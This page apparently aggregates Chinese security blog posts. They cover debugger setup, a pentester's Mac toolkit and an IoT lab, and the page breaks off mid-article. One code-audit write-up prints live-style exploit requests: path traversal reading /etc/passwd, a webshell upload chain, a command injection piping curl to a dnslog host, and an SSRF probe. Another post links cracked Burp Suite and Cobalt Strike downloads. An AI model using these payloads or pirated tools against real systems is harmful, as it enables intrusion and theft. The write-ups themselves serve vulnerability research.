配置Phpstorm+Xdebug调试环境 安全闲碎

配置Phpstorm+Xdebug调试环境

这篇文章来自公众号的留言环境Windows 10PhpStudy 2016Phpstorm 2021.1.1Php 5.5.38Firefox + Xdebug-ext步骤step1 找到phpstudy自带的xdebug路径step2 配置php.ini详细配置zend_extension="E:phpStudyphpphp-5.5.38extphp_xdebug.dll"xdebug.remote_enable = Onxdebug.remote_host = 127.0.0.1xdebug.remote_port = 9100xdebug.idekey=PHPSTORMstep3 测试是否xdebug是否配置成功重启查看phpinfo出现xdebug即说明安装成功了step4 phpstorm配置与php.ini内容对应Debug port配置DBGp Proxy 配置Servers配置step5 浏览器配置下载火狐扩展-Xdebug-ext设置 IDE key,与php.ini保持一致step6 动态调试demo以sqli-lab为例下断点开始debug并监听浏览器将扩展打开访问http://127.0.0.1:8088/sqlilab/Less-1/?id=1%27如图:最后:       别刷微博了,快卷起来,开始"愉快"的挖洞之旅吧!!! 本文始发于微信公众号(don9sec):配置Phpstorm+Xdebug调试环境
阅读全文
无源码环境下的代码审计之旅 代码审计

无源码环境下的代码审计之旅

分享一下前段时间遇到的系统无源码(不开源)的代码审计(捡漏)tips任意文件读取/下载  在线审计n(1)day -> 0daygetshell后 打包源码 是否出现常见漏洞组件或框架(编辑器/shiro/fastjson等)目录案例1: 文件下载->RCE案例2: nday -> 0day(任意文件下载+RCE)案例3: 使用了存在漏洞的框架(RCE)案例4: 使用了存在漏洞的编辑器(SSRF)...案例1找到一处文件下载的地方GET /download?module=&method=Download&name=test.zip&filepath=doc/test.zip HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xmlAccept-Encoding: gzip, deflate‍burp抓包,换为post请求发现可下载任意文件POST /download HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xmlAccept-Encoding: gzip, deflatemodule=&method=Download&name=test.zip&filepath=../webapps/WEB-INF/web.xml读取日志文件判断class文件的位置POST /download HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)Accept: text/html,application/xhtml+xml,application/xmlAccept-Encoding: gzip, deflatemodule=&method=Download&name=test.zip&filepath=../logs/catalina.2021-xx-xx.log下载class文件分析审计在/download路由下的servlet存在上传文件和更新文件的操作首先上传一个空文件到web目录:POST /download HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xmlAccept-Encoding: gzip, deflatemodule=&method=upload&txtFile_Name=x.jsp&home=/&filepath=../webapps/ 再更新文件内容为webshell:POST /download HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xmlAccept-Encoding: gzip, deflatemodule=&method=updateContent&home=/&filepath=../webappsdebugx.jsp&content=xxxxxx()案例2某系统存在弱口令+后台RCE,打包源码# 打包源码tar -zcvf /usr/abc/www/xx.tar.gz /usr/abc/www/# 下载源码http://www.xxx.com/xx.tar.gz# 删除压缩包rm -f xx.tar.gz下载后进行代码审计任意文件下载 1枚后台RCE 1枚任意文件下载代码如下很明显的漏洞点,可用../进行目录穿越构造poc/?c=backup&a=download&file=../../../../../../../../../etc/passwd后台RCE代码如下同样,也是明显的漏洞点,直接拼接了没经过滤的参数destip构造poc/?c=maintain&a=iptracepost:destip=127.0.0.1|curl q2tsgk.dnslog.cn案例3某系统使用了存在漏洞的框架通过目录扫描/探测发现了该系统存在路径 vendor/phpunit/src/Util/PHP/eval-stdin.php瞬间想起了之前复现过的漏洞漏洞框架:PHPUnit漏洞编号:CVE-2017-9841直接用工具打一波提取指纹,看看互联网案例影响范围还行,拿shell, 借用源码,继续审计。案例4某oa系统使用了存在漏洞的编辑器使用nday拿到shell, 打包源码下载,然后进行代码审计。在其目录机构中发现了ueditor构造poc/ueditor/jsp/controller.jsp?action=catchimage&source=http://dnslog.cn/test.jpg找了张当时刚捡到漏洞并验证的截图ps:欢迎一'点'三连(点分享+点赞+点在看) 本文始发于微信公众号(don9sec):无源码环境下的代码审计之旅
阅读全文
MacBook 个人渗透环境配置 安全闲碎

MacBook 个人渗透环境配置

    因为一些事情及身体原因吧,不再更新公众号了,本篇文章为最后一片文章,手里的其他公众号也会相继断更注销,但是我还是会继续从事信息安全行业。    关于割韭菜一说其实我不是很赞同,我觉得没有韭菜也没有割韭菜这个东西,有的只是一群自己做不到看着别人能做到所以自己心里不平衡的柠檬精们心理安慰罢了。    依稀记得某人在19年的时候喷我说“阿浪自己写了个靶场弄了个公众号搞星球啊?还收费?还搞培训?不过是割韭菜罢了。”然后今年就看到此大佬也搞培训,也搞星球~而且价格还不菲~(真香)其实做自己想做的事情做自己喜欢做的事就好,有缘再会吧。系统基础环境搭建安装常用工具QQ直接在AppStore进行下载安装即可,开车扯犊子用.微信直接在AppStore进行下载安装即可,花钱潜水摸鱼用.微信小助手在终端内使用以下命令即可安装成功!sudo rm -r -f WeChatExtension-ForMac && git clone --depth=1 https://github.com/MustangYM/WeChatExtension-ForMac && cd WeChatExtension-ForMac/WeChatExtension/Rely && ./Install.sh && cd ~回车后输入Mac开机密码,然后会提示让你安装Git(你电脑如果没装的话根据提示安装即可),安装正常来说很快,但是不排除网络很差...比如我!等待安装成功后启动微信即可在菜单看到“微信小助手”网易云音乐直接在AppStore进行下载安装即可,一边渗透一边听歌岂不乐哉?WPS直接在AppStore进行下载安装即可,不建议安装不然你就能看到公司发给你的文档了!TerMius直接在AppStore进行下载安装即可,SSH、SFTP连接工具。自动切换输入法、超级右键直接在AppStore进行下载安装即可,懒人必备。XCODE直接在AppStore进行下载安装即可,必备。Parallels直接在AppStore进行下载安装即可,Mac虚拟机程序,牛逼就完事了!Jump Desktop直接在AppStore进行下载安装即可,RDP连接工具。IpIc直接在AppStore进行下载安装即可,Markdown图床工具。One Markdown直接在AppStore进行下载安装即可,Markdown编辑器。Google Chrome渗透必备浏览器,官网:https://www.google.cn/intl/zh-CN/chrome/Visualstudio看个人喜好吧,我比较喜欢用这个,官网:https://code.visualstudio.com/ClashX机场自己找,这里就不多说了~ 下载地址:https://github.com/yichengchen/clashX/releases 下载下来后安装,然后打开后在菜单栏可以看到这个图标点击后配置订阅地址添加订阅地址然后就Ok啦~终端环境配置终端美化该说不说自带的终端界面真的丑到爆了!在网上找了很多的美化教程但是感觉不如人意,所以把我自己研究的方法写出来。使用终端代理进行安装“zsh”:sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"安装完成后点击菜单栏左上角 终端-偏好设置,然后根据下图设置:设置完成后重新打开终端就是这个样子的:然后安装powerlevel10k:git clone https://github.com/romkatv/powerlevel10k.git $ZSH_CUSTOM/themes/powerlevel10kset ZSH_THEME=powerlevel10k/powerlevel10k in your ~/.zshrc.完成后重新打开终端发现乱码:这个时候我们去安装字体即可:https://www.nerdfonts.com/font-downloads 找到这个点击Download 下载即可下载后解压出来,然后安装 “Hack Bold Nerd Font Complete Mono” 字体。安装字体完成后设置一下终端的字体即可。重新打开终端我的插件列表,建议百度搜索名字查看使用方法!plugins=( git zsh-autosuggestions extract hitokoto zsh_reload z safe-paste colored-man-pages sudo zsh-syntax-highlighting)渗透测试环境Brew安装 /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"如果无法安装包错的话请挂梯子即可。Python3安装一条命令足以 brew install python3Burp2.1汉化破解版下载链接: https://pan.baidu.com/s/1qmMdjZiixcKRnhJT7KQI7w 密码: 5sij Java Jdk:https://www.oracle.com/java/technologies/javase-jdk16-downloads.html使用教程:windows请直接执行vbs即可使用,不需要下载JDK MAC/linux用户请下载对应系统的jdk安装包进行安装,安装后执行:java--illegal-access=permit-Dfile.encoding=utf-8-javaagent:BurpSuiteCnV2.0.jar-noverify-jar burpsuite_pro_v2021.4.jarSqlMap安装一条命令足以 brew install sqlmapNmap安装一条命令足以 brew install nmapCobaltstrike安装下载链接: https://pan.baidu.com/s/1XGTQAvllcmyAPD6RXotlMA 密码: 3kfgjava-Dfile.encoding=UTF-8-javaagent:CobaltStrikeCN.jar-XX:ParallelGCThreads=4-XX:+AggressiveHeap-XX:+UseParallelGC-jar cobaltstrike.jarVulMap安装git clone https://github.com/zhzyker/vulmap.git && cd vulmap && pip3 install -r requirements.txtGoby安装下载地址:https://gobies.org/ 启动就可以了其他的我也不知道安装点什么了最后附一张摸鱼的时候画的一个壁纸叭~ 本文始发于微信公众号(云剑侠心):MacBook 个人渗透环境配置
阅读全文
U盘目录穿越获取车机SHELL(内含模拟环境可上手实践) 逆向工程

U盘目录穿越获取车机SHELL(内含模拟环境可上手实践)

利用 U 盘 Getshell 是不是还停留在 Badusb、病毒U盘上,这次就来看一个不一样的。前段时间在浏览 Github 时看到了一个日产车机破解项目,其中有利用 U 盘获取车机 SHELL 的骚操作。感觉挺有意思的,花了点时间找到了车机固件并复现了漏洞。顺手写了一个 Dockerfile 供大家一起玩耍。目录穿越目录穿越大多发生在 WEB  中,没想到竟然还能出现在硬件设备中。车机的操作系统为 Linux,U 盘等外设热插拔由 udev 实现。udev 是 Linux 内核的设备管理器,配置文件在 /etc/udev 下 。udev 会根据设备的 UUID 和 LABEL,构造挂载点。UUID 是块设备的唯一标识符,LAEBL 是块设备的一个标签。车机中自定义了 U 盘挂载脚本,在 udev 配置文件 /etc/udev/rules.d/local.rules中指定 block 设备由脚本 /etc/udev/scripts/mount.sh处理。SUBSYSTEM=="block", ACTION=="add",   KERNEL=="sd*", ENV{ID_FS_TYPE}=="?*",   ENV{DKD_PARTITION_TABLE}!="1",   ENV{DKD_PRESENTATION_HIDE}!="1",   RUN+="/etc/udev/scripts/mount.sh", RUN+="/etc/udev/scripts/trace_proxy.sh"SUBSYSTEM=="block", ACTION=="remove", KERNEL=="sd*", ENV{ID_FS_TYPE}=="?*", RUN+="/etc/udev/scripts/mount.sh", RUN+="/etc/udev/scripts/trace_proxy.sh"SUBSYSTEM=="block", ACTION=="change", KERNEL=="sd*", ENV{DEVTYPE}=="disk", RUN+="/etc/udev/scripts/mount.sh"问题就出现mount.sh 脚本中,使用 ../../可实现路径穿越,获取系统权限。MOUNT="/bin/mount"UMOUNT="/bin/umount"MOUNTPT="/dev/media"MOUNTDB="/tmp/.automount"automount() {   if < -z "${ID_FS_TYPE}" >; thenlogger -p user.err "mount.sh/automount" "$DEVNAME has no filesystem, not mounting"return   fi   # Determine the name for the mount point. First check for the   # uuid, then for the...
阅读全文
第1章-重构1-Win下各语言便携环境制作 安全文章

第1章-重构1-Win下各语言便携环境制作

重装电脑的次数总是无限的,总不能每一次都花一两天去安装环境吧!!!所以就想到了将所有的脚本环境进行免安装处理,实现解压即用。△△△点击上方“蓝字”关注我们了解更多精彩0x00 Preface上次制作的环境,发现还是有很多小伙伴有此需求。但篇幅过长,不易理解,因此需要重新重构。新增了目录结构,大家可以按照自己的需要去看部分的环境制作本文篇幅较长,但是实际操作内容不多,建议浏览至已经制作好的环境分享:请查看重构20x01 目录结构目录前言便携版制作简述便携python2及python3环境制作制作原理:python2的额外依赖:python2与python3兼容性完美解决办法:修复python便携版无法直接运行py文件的问题:其他备注:详细参考:便携jdk8及jdk11环境制作制作原理:修复免安装java环境双击运行jar文件:jdk8与jdk11兼容性完美解决办法:其他备注:详细参考:ruby及其他便携环境制作制作原理:安装参考:0x02 便携版制作简述本便携制作方式都是通用的简易制作方式,简LOW但实用。制作流程:安装安装版环境——>保存安装文件夹 【这是制作时NI该做的】分析注册表——>制作注册表导入文件 【已有模板,改改就行】分析环境变量——>制作环境变量导入脚本【已有模板,改改就行】使用流程:移动文件夹——>导入环境变量——>导入注册表多版本兼容性解决办法:同语言的不同版本都可以通过拷贝可执行文件实现完美的区分和兼容。对于提供了免安装版环境的语言环境,如nodejs、perl等,只需要移动文件夹——>导入环境变量0x03 便携python2及python3环境制作制作原理:经测试,安装python以后移动文件夹和相关依赖后到其他电脑的相同文件夹,设置环境变量与注册表后,能够实现python环境的重用。python2的额外依赖:python2环境安装后,除python27.dll 依赖存放于C:/windows/system32目录下以外,不依赖于windows其他文件,可以直接剪切移动相关文件到新电脑同位置python2与python3兼容性完美解决办法:分别在python2/3目录下,将python.exe额外复制一份为python2/3.exe。注意,保留原先的python.exe文件修复python便携版无法直接运行py文件的问题:指定便携版python打开py脚本时,注册表中打开方式键值中少了传递参数的功能本需要 C:/python路径/python.exe “%1” %* ,其中"%1" %* 起传递参数的作用。但是注册表中只加入了 “C:/python路径python.exe” “%1” ,因此,无法直接运行py脚本因此需要重新导入注册表进行修复。其他备注:1、python官方提供的zip版本实际上功能不全,运行时会缺少很多东西。2、需要修改固定的目录可以参考公众号的portable python文章。详细参考:Windows制作免安装python2环境https://blog.csdn.net/lql971203/article/details/102931388Windows 制作免安装的python3环境https://blog.csdn.net/lql971203/article/details/102930431Windows下python2与python3兼容性完美解决办法https://blog.csdn.net/lql971203/article/details/95141064修复python便携版无法直接运行py文件的问题https://blog.csdn.net/lql971203/article/details/1051495240x04 便携jdk8及jdk11环境制作制作原理:经测试,直接安装java以后移动文件夹到其他电脑的任意文件夹,设置环境变量与注册表后,即可实现java环境的重用。修复免安装java环境双击运行jar文件:参考正常安装的jdk文件的注册表,重新优化修改了注册表文件的一些参数,即可修复该问题。jdk8与jdk11兼容性完美解决办法:分别在jdk8/11的bin目录下,将java.exe额外复制一份为java811/java11.exe。注意,保留原先的java.exe文件。可参考python兼容性的解决方案其他备注:1、JDK9及后面的版本已经没有自带jre环境,需要jre环境可以额外安装后保存。其实jdk就可以运行jar包了,所以有没有都不重要。详细参考:免安装java环境不能双击运行jar文件的优化解决办法https://blog.csdn.net/lql971203/article/details/102932453burpsuite在不同版本jdk下运行可能存在的BUGhttps://blog.csdn.net/lql971203/article/details/102932578Windows 制作免安装的JAVA环境【可忽略】https://blog.csdn.net/lql971203/article/details/1024860630x05 ruby及其他便携环境制作制作原理:经测试,安装ruby以后移动文件夹到其他电脑的任意文件夹,设置环境变量与注册表后,能够实现ruby环境的重用。详细参考:windows下Ruby安装 http://dwz.date/dzjc0x06 Summary 总结大部分版本的脚本语言提供完善的免安装版本,需要要解压后配置环境变量可,可以将环境变量成bat文件,实现快速的设置。例如:便携nodejs环境制作:官方提供免安装版本,只需要解压后设置环境变量即可便携maven环境制作:官方提供免安装版本,只需要解压后设置环境变量即可便携golang环境制作:官方提供免安装版本,需要额外加个gopath环境变量如果脚本语言没有提供完善的免安装版本,需要手动安装后分析环境环境变量和注册表信息,安装python便携版的制作方式进行。END如您有任何问题、建议、需求请后台留言NOVASEC公众号!感谢大哥们的对NOVASEC的支持点赞和关注加入我们与萌新一起成长吧!如有任何问题、建议、合作、投稿请加NOVASEC-MOYU,以方便及时回复。 本文始发于微信公众号(NOVASEC):第1章-重构1-Win下各语言便携环境制作
阅读全文
Agent VS 网络数据,云中业务性能监控有何不同? 云安全

Agent VS 网络数据,云中业务性能监控有何不同?

为降本增效,促进业务发展,实现数字化转型,越来越多的企业将业务迁移至云上。上云后,鉴于云环境内网络与业务架构的模糊性,业务服务节点从传统物理环境下的百级上升至万级甚至百万级,运维管理难度可想而知。同时,随着运维管理规模的增加,业务系统的连续性必须保持稳定,且强监管需求不降反增,运维人员的配置未能跟上业务上云的脚步,业务稳定性难以保障。 无论是云环境还是传统物理环境,保障业务连续性、可用性、稳定性都是运维的核心价值与意义。云时代,企业的IT环境变得异常复杂,从跨越物理环境与云环境到跨越公有云与私有云,尽管云供应商可以为企业提供部分基础设施的监管与维护,但仍需要运维进行业务系统监控、业务故障恢复等性能管理工作。因此,构建云中业务性能监控体系,保障云中应用可靠性与运行质量成为运维部门的工作难点。 云中业务性能监控,AgentVS网络数据 目前,市场上主流的云应用性能监控方案主要基于两种技术方式:一类是基于Agent(即插码)的技术实现形式,包括Skywalking、Jaeger、Zipkin等开源工具,以及一些商用软件。目前官方有两种部署方式:一是DaemonSet方式;二是Sidecar方式。Agent采用全自动探针或者手动探针对中间件、Open Tracing组件甚至是私有化组件进行监控,除部分软件工具(Skywalking)使用字节流等方式外,均需要在服务器上进行部署或者在代码中嵌入SDK。在Agent之外,还有另一类基于网络数据(网络流量)的技术实现形式,通过采用VM微探针或虚拟探针的方式,同时兼容公有云与私有云,对容器内的网络流量实现无侵入的实时转发,实现低开销、高性能的网络流量捕获,对云环境实现无感式监控。 Agent,自下而上式的云中应用性能监控 基于Agent的技术方案主要监测代码间的调用关系与时延,可以看到代码层面的应用节点,因此获取的应用指标偏底层。在进行业务性能监控时,试图通过聚合值发现底层错误或故障,将问题指标在影响到上层应用之前提前定位。但是,在实际操作中面临两大考验:云环境中,底层基础设施与服务器之间存在异常分配,譬如资源共享不稳定导致监控服务器异常复杂等;云环境中,一个应用由多个组件构成,需要监控越来越多的模块,在实际监控场景中将这些信息关联并找到根源非常困难。 此外,基于agent的分布式链路追踪所调取的Metrics指标也是基于服务器等底层架构,当底层数据产生异常告警时,很难通过分析快速定位到受影响的业务应用。 网络数据,自上而下式的云中应用性能监控 基于网络数据的技术方案主要监测业务的应用节点与部分网络节点,可以看到业务的应用层指标,譬如交易量、响应率、成功率等,因此获取的应用指标直接反映了业务的健康度。在进行业务性能监控时,通过监控上层聚合数据,从顶层的业务问题出发深入钻取底层指标。该方式在实际操作中同样面临以下挑战:为防止在系统层面出现问题进而影响用户体验,分布式系统可能会内置容错机制延时故障和错误,因此需要通过技术手段实现智能化的故障定位,直接锁定故障根因;从发生故障到扩散至整个系统可能会经历较长的时间间隔,当注意到上层故障时可能为时已晚,因此需要通过实时的监测机制控制延迟。 即时的故障告警与定位对云中业务性能监控十分重要。由于当前云环境基本都采用微服务架构,当众多的微服务交织在一起时,故障定位就变得棘手。因此,无论是基于Agent还是基于网络数据的技术方案基本都采用分布式架构,通过对分布式调用链进行追踪,及时分析性能状况,可以快速定位与解决故障。 分布式链路追踪体系里有三个重要的概念,即Metrics、Tracing与Logging。Metrics即指标,主要反映组件实时状况与健康度;Tracing 即链路,反映单次请求范围内如何处理信息;Logging即日志,反映离散的事件或过程。在云性能监控领域,tracing通常作为优化系统、排查问题的高阶方法,logging被视为排障的主要依据。由于agent是一个网络守护进程,监听通过UDP发送过来的spans并将其批量送给collector,因此基于Agent的监控方案更偏向于通过Tracing的形式进行链路追踪,而基于网络数据的监控方案更偏向于通过Metrics进行故障反馈;通过Tracing模式可以查找到链路上出现问题的环节,通过查日志可以定位系统问题,并不意味着Metrcis监控的有效程度最低。相反,实时的监控机制、智能的告警配置同样可以快速定位故障根因。(Metrics、Tracing、Logging三者间关系示意图) 此外,由于底层应用数据的告警量往往很大,且存在海量误告等状况,从底层应用数据指标推演受影响的业务难度极大,因此基于Agent的技术方案在进行业务性能监控时,很难快速感知业务实时运行过程中的异动;而上层应用数据与业务应用高度关联,譬如响应率、及时率、成功率等指标直接呈现业务运行连续性,运维人员可快速感知业务的实时运行状态。 基于网络数据的性能监控,白盒监控与黑盒监控双管齐下 应用性能监控按照不同维度的应用指标与监控意图可以划分为:白盒监控与黑盒监控。白盒监控主要关注原因,通过暴露系统内部的相关指标了解系统内部的实际运行状态,自下而上式的监控可以直接预判问题根因;而黑盒监控主要关注现象,自上而下式的监控在系统或者服务发生故障时快速告警,通知运维人员进行处理,及时排障。在以业务为核心的运维体系架构中,业务性能监控更侧重于黑盒监控。 由于云环境应用系统监控的目标是提供对复杂信息系统的全面监控,反映云资源池的健康状况与可用性,构建一个可控、可预测的云环境,支持云业务安全、稳定、高效、持续运行。因此,为及时掌握系统资源现状与运行信息,业务性能监控在做好黑盒监控的基础上,也需要具备白盒监控的能力。 云计算通过云平台与虚拟化技术实现资源池统一化管理,在支持自服务与资源弹性伸缩的同时也给云中的流量采集带了新的挑战。流量采集作为监控的前提,与生产网络一样,其准确性、稳定性与可靠性直接影响黑、白盒监控的分析结果:在传统网络环境下,网络流量采集主要通过交换机镜像和分光器的方式进行全量、实时、精准的采集;在云环境下,同一物理机不同虚机之间的业务交互的东西流量不再经过网络物理交换机,而将面临虚机监控的缺失;云环境里计算、存储、网络等物理资源被池化和虚拟化,云中的虚机上下线、扩容、迁移、切换等均需通过自动化实现,镜像策略无法随虚机的切换实现同步部署。 因此,基于云平台的动态性特点,云环境下的流量采集势必要突破传统交换机镜像的方式,通过灵活、自动化采集和监控部署,实现虚拟机间东西向流量的采集,并加强过载保护机制做到对服务器无感或最小感知。 基于网络数据的业务性能监控技术通过虚拟交换机利用微探针或SDN引流的方式,实现全流量、实时、精准的跨多云网络环境、多网络区域的采集,通过自动化部署、集中管控采集器,动态感知云中流量资源和业务应用资源的变更联动,并通过云上、云下一体化的全链路监控体系实现对业务应用“黑盒监控”,动态感知交易量等业务指标的异动;通过搭建智能化的故障告警与定位系统,定位业务故障根因,实现应用性能的“白盒监控”。 天旦业务性能管理BPC基于网络数据,通过安全可靠的采集技术实现跨多云环境的流量采集,同时支持分布式架构和集中管控,实现云上、云下一体化的全链路业务性能监控,被客户誉为“ 业务监控状态的第一感知源 ”。扫描上方二维码,了解天旦业务性能管理BPC 本文始发于微信公众号(运维帮):Agent VS 网络数据,云中业务性能监控有何不同?
阅读全文
带你走进工控环境的世界 - 基础物联网环境搭建 逆向工程

带你走进工控环境的世界 - 基础物联网环境搭建

0x1:导语  由于在技能竞赛周中因为某老板的好奇于是花了2天半的时间学习了一下相关的知识将其临时存储在大脑中陪某老板一同参加“物联网技术及应用”竞赛跟物联网的学长们一起学习这套设备的机会!0x2:设备认识  学习之前,首先,得认清楚所有用到的设备,每一个设备的原理,但是这个东西我将会将它放到拓扑图层次分析完之后去,因为关于涉及到的设备的一些知识可能直接描述会变得不怎么容易理解,所以我将会从拓扑图开始由一个大的层次一层一层的去描述下去!(ps:某位大佬说过只要内容到位顺序并不影响阅读~)0x3:关于对物联网的认识  对于物联网的看法,可能仅仅是片面的了解,在我看来,物联网终将成为类似于“因特网”的名词,这就好比于“车联网”已经从物联网这个大概念中脱离出去,物联网虽说是一个大的范围,万物互联,在我看来,不仅仅只是万物互联!而对于安全行业的我们来说,其实这将会是我们一个更大的机会,其实我们对物联网并不远,大家用过的水卡,饭卡之类的,其实都是物联网技术的成果。0x4:拓扑图分析  完整的拓扑图如下方所示(可能略不清晰如需完整清晰的拓扑图):对于刚踏入物联网的门槛决心要去搞物联网安全的我,对着这张拓扑图组装完所有设备后将会使我产生极大的成就感!(膨胀一下~)最开始搭建的时候,我表示听着学长们的描述,变得很难理解,特别高档,连接完线我还要一个一个去用万用表测是否接错线了,同时我也遇到过并联太多的设备导致本该是24伏的电压被拉低的只有3伏,当时怎么去测线路和查看配置都没问题,所以拥有电路分析等方面的基础是多重要。首先咱们对整张拓扑进行分析,发现,这张图可以分为两个网络部分,分别是“服务器端网络”和“客户机端网络”两个部分。所有设备纵观全局,其实最后都接到了这个无线路由器,1 是跟所有工控设备 (即用到的各种传感器之类的硬件) 链接到一起的,属于工控物联网网络,而2 则是属于正常用户的一个网络,通过交换机链接下级设备(客户机)和上级设备(路由器)。所以一旦这台无线路由器罢工全家瘫痪~对于这部分的设备颜色并不区分线的类型(其它的一般是红正黑负剩下的是信号线)因为这部分的线基本上都是Rj-45 类型的网线。接下来我们来挨个看无线路由器上的每个设备链接的硬件并对它的作用进行分析首先是路由 LAN 口的1口它连接的设备是摄像头。摄像头和1口是使用网线进行连接的由连接的适配器插入220V 进行供电接着看2口2口是和服务器接在一起的再由服务器通过专用的连接线连接到桌面的一些设备因为服务器在直接链接了无线路由器,所以我们将要进行路由器方面的配置将会在服务器上去访问无线路由器的管理Web进行配置路由。再来看第三个口接到了串口服务器我们在去顺着串口服务器去寻找串口服务器连接到的设备再去分析串口服务器干了些啥。通过下图,我们基本可知,串口服务器链接的设备有LED显示屏、UHF射频读写器(高频)、Zigbee协调器(近距离无线网络)、ADAM-4150(数模量接收/控制)相当于由这一部分可以简单分析出整个控制的流程是这样的,先通过配置好的服务器端发出指令给处于同一局域网(无线路由器lan口)环境下的串口服务器经过串口服务器再去发出指令控制下级的设备进行工作,比如所有有线设备的运行实际上经由ADAM-4150模块接收串口服务器的信息后去通过信号线控制继电器去断开或闭合使设备工作,而无线组网部分则是采用了ZigBee协议(即zigbee协调器)去链接其他的无线设备,值得注意的是zigbee协议和摄像头采用的无线协议(WiFi)是两个概念,虽然两者都是通信协议两者的概念将在后文进行区分。下面接着我们来看无线路由器的最后两个口,因为这两个口所需要处理的事情不多于是我将两者一起来叙述,由下图可以看出,4口连接的是一个交换机交换机下面链接的是客户机范围,从这里,我们可以简单的把无线路由器看作是个大环境,在这个大环境之下,可以分为两个小环境,即工控设备区域(无线路由器1,3口)和客户区域(无线路由器4口),在这里我将2口独立出来,却不把它当作一个单独的区域,是因为,设备区域需要服务器进行控制,用户区域需要服务器提供服务 所以 这两部分都包含了服务器服务器则在这个环境中扮演了一个重要的角色两者谁缺了服务器都不行。接着我们在来去说无线路由器的WAN口这个口是链接的上一级的网络因为我们所有的设备都在无线路由器所分配的一个局域网环境内简称内网于是这个与上一级通信的WAN 口则是连接的外网(这里不能理解成公网因为说不定这个这个网络的上层也是一个局域网)。设备:无线路由器这套设备中提供的路由器是TP-Link的TL-WDR6320路由器(该型号在漏洞平台暂无相关漏洞,所以只要密码设置的好,能杜绝大部分威胁),对于路由器的配置,可以通过两个方法进到路由器的配置Web页面,第一种就是直接插上网线,连接路由器后在电脑上的浏览器地址栏输入“tplogin.cn”进入配置页面,第二种就是加入你电脑是笔记本,可以通过连接这个无线路由器发出的WiFi,连接后同样重复上面的动作,在浏览器地址栏输入“tplogin.cn”,当然输入“192.168.0.1或192.168.1.1”也同样能进去,但是为了避免IP分配的一些细节,最好是输入“tplogin.cn”,会好一点。对于路由器,你可以将其看作一个网关,因为路由器本身就是工作在网络层的设备,用于沟通两个不同的网络,局域网下的一切通信想到到达另外的一个网络,就必须需要路由器这个设备去进行和另一个网络去沟通,反之亦然,别的网络想要访问你路由器之下的设备,就必须去沟通,所以这将会是整个模拟的工控环境中的重中之重一旦路由器罢工,所有一切都凉凉,所以在后期的针对工控安全的测试中路由器将会是一个很好的入手点!设备:网络摄像头(支持无线和有线)在这套设备中提供的网络摄像头是支持有线和无线两种方式的,对于摄像头的配置,其实是需要在路由器配置完毕后,将摄像头通过网线连接到路由器后,在通过一台连接了路由器的电脑去扫描摄像头的IP地址,获取到摄像头的IP地址后,可以通过配置软件去更改摄像头的IP地址,值得注意的是这里全部采用静态IP因为这将会使工控环境下的设备变得易于管理。设备:串口服务器串口服务器实际上,是提供的一个将串口通信转换成网络通信的一个功能使串口设备能使用网络来进行管理,新大陆提供的是中金通讯的串口服务器具有Web管理端,在进行工控环境的渗透测试时,当你已经进入工控内网环境可以尝试通过扫描特定端口进入串口服务器,修改配置当然我不建议进行这么做(因为这将会可能会对企业带来不可想象的灾难)!现如今很多政企单位都是这样的一个场景外网有着强大的云Waf 守护着你的安全但是一旦进入内网所有的一切都毫无保留的暴露在了入侵者的眼里。设备:ADAM-4150ADAM-4150是一个数字量采集控制模块在上图左侧我们能看出他是连接了众多的“信号线”在这个拓扑图中它其实就是负责将从客户端接收到的指令下达给继电器,由继电器控制风扇或灯启动或暂停,当然同时它也在接收到火焰传感器,人体感应传感器,烟雾传感器等传感器反馈的数据后在讲这些数据发送到服务器,由服务器进行发出下一级的指令,由此我们可以看到这个设备的重要性,他控制着几乎整个拓扑图中所有有线设备的运行从左侧我们可以看到4150有着众多的接线口但归类后其实可以总结出下面几类接口:DI口:数字输入信号(digitalinput)DO口:数字输出信号(digitaloutput)+VS口:设备火线(正24伏输入)GND口:接地(D.GND数字地,(B)GND设备地)D+口:差分数据信号data+D-口:差分数据信号data-这里值得注意的是data+和data-并没有准确的区分谁是传输的因为这两个口是共同运作的对于这个口我的理解可能不是那么的正确因为这是我大概在几个月前看的《详解USB协议》中理解到的。对于这个设备的安全性,我所考虑到的是信息泄露(在 geekpwn 挑战赛中就有这样的例子)这里是因为该设备连接了众多的传感器,一旦该设备被控制可能会造成一些极其敏感的信息泄露。设备:工控平板对于该平板设备因为这套设备中这个平板是采用的安卓系统并且我看了下安卓版本在 5.x   这个范围内,所以我也就淡定的笑了笑安卓版本小于7(大于等于8后system分区多了些恶心人的东西)可操作的空间太大这个就不多说吧。ZigBee协调器通过ZigBee协调器将各个ZigBee模块组成一个无线传感器网络,当然最后还是是通过串口连接到串口服务器,然后串口服务器在于服务器进行通信在这套设备中ZigBee协调器实际上负责的是接收温湿度等传感器的数据。上图是其他的zigbee模块对于该部分的安全测试因为ZigBee是目前IoT设备中最常见的通信协议之一所以使用zigbee进行通信的设备非常多因为是无线协议所以攻击者可以通过进行嗅探通信传输中的敏感信息同时夺取关键基础设施的控制权(这将会造成一些很严重的影响威胁到整个服务的运行)。Lola网关和Lola模块Lola是一个远距离低功耗的一个局域网无线传输协议因为是基于CSS调制技术(Chirp Spread Spectrum)的所以是比较稳当的但是由于它依旧是采用无线传输所以依旧有被通过嗅探的方式获取敏感数据的风险(但是太难了)。UHF射频读写器这个设备没得什么说的,超高频RFID技术而已在实际的生活中比如我们的水卡,饭卡之类的其实是低频卡,对于这类设备往往是最不安全的,若是联网卡还好类似于水卡通过pm3之类的设备都能白嫖好久了对于这个我是感触最深的两个男生去接热水互相看着对方插着一样的似乎是一样的卡互相看向对方的眼睛然后都轻轻的微笑了起来。0x5:相关协议知识在这个装配的过程中无线通信协议用到了四种分别是WiFiZigBee Lora和RFID常用的协议有线基本基于串口通信。在这其中WiFi和RFID我觉得没必要去说了ZigBee和lora吧 因为 